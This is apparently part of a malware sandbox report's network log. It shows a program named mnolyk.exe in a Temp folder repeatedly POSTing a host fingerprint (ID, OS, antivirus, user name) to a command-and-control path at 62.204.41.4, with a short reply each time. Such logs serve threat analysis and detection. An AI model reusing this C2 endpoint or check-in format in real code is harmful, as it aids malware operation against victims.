485	192.168.2.5	50198	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:20.390515089 CET	730	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:20.455348969 CET	730	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
486	192.168.2.5	50199	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:20.621767998 CET	731	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:20.685482025 CET	731	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
487	192.168.2.5	50200	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:20.859042883 CET	732	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:20.923166990 CET	732	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
488	192.168.2.5	50201	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:21.107449055 CET	733	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:21.174144983 CET	733	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
489	192.168.2.5	50202	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:21.791440964 CET	734	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:21.856420994 CET	734	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.5	49749	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:17.867892981 CET	177	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:17.933248043 CET	177	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
490	192.168.2.5	50203	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:22.078648090 CET	735	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:22.143944025 CET	735	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
491	192.168.2.5	50204	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:22.348680019 CET	736	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:22.412312031 CET	736	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
492	192.168.2.5	50205	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:23.312321901 CET	737	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:23.378950119 CET	737	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
493	192.168.2.5	50206	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:23.596824884 CET	738	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:23.660908937 CET	738	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
494	192.168.2.5	50207	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:25.359503031 CET	739	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:25.428631067 CET	739	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
495	192.168.2.5	50208	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:25.676245928 CET	740	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:25.740968943 CET	740	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
496	192.168.2.5	50209	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:25.926204920 CET	741	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:25.991401911 CET	741	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
497	192.168.2.5	50210	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:26.169612885 CET	742	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:26.235832930 CET	742	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
498	192.168.2.5	50211	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:26.414967060 CET	743	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:26.480029106 CET	743	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
499	192.168.2.5	50212	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:26.656554937 CET	744	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:26.723640919 CET	744	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49702	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:05.106585979 CET	101	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:05.172039032 CET	101	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.5	49750	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:18.108793974 CET	179	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:18.173399925 CET	183	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
500	192.168.2.5	50213	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:26.928061962 CET	745	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:26.992341995 CET	745	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
501	192.168.2.5	50214	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:27.169596910 CET	746	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:27.234812975 CET	746	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
502	192.168.2.5	50215	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:27.402725935 CET	747	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:27.466136932 CET	747	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
503	192.168.2.5	50216	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:27.644778967 CET	748	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
